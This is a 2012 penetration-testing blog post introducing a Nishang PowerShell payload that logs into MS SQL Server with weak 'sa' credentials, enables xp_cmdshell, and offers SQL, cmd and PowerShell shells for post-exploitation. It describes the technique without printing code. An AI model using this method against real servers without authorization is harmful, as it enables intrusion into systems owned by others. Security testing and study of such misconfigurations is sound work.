Friday, December 7, 2012

Command Execution on MS SQL Server using PowerShell

One of my favorite "vulnerabilities" during Pen Tests is easy/guessable password for "sa" on MS SQL server with mixed authentication enabled, it means instant pwnage. Though a bit hard to find nowadays (SQL server 2008 and later enforce password complexity) , still you would manage to get a couple of them in a large environment. This post is just one more method to exploit this misconfiguration.

I try to use PowerShell in my pen tests as far as I can and this method is the result of one such pen test. I wanted to execute commands on one of the production sql servers, with powershell :)

My search landed me to this blog post by Niklas. I have already included, with permission, the script discussed in the blog post in Nishang 0.2.0 as Get-SqlSysLogin.ps1. But there is more to that post, it discusses how to execute commands on the sql server using powershell. I implemented the technique in a new payload of Nishang, Execute-Command-MSSQL

Lets get started.

My lab setup was a SQL Server 2008 Express on a Windows 7 machine. I set weak password for "sa" as "sa1234", which I have seen in one of previous Pen Tests.

Execute-Command-MSSQL asks for three mandatory parameters, the IP address or ComputerName to connect to, the username of admin on sql server and password for the user.

If the connection is successful and credentials work, the payload will enable xp_cmdshell on the sql server.

Now, we can choose from one of the three "shells", a powershell shell, a sql shell or a cmd shell.

SQL Shell: This allows to run SQL commands on the server.

cmd shell: This is the plain old window cmd shell, for machines without powershell (not tested on old machines).

powershell shell: This provides with a powershell "shell".

These different "shells" provide us great opportunities to do some really effective post exploitation.

Note that though the shells appear to persistent, they are actually not. Each command is executed in a new process. The shell prompt is shown just for user friendliness :)

You can download Nishang 0.2.1 here or update your repositories.

Hope this would be helpful. I look forward for feedback, comments and feature requests.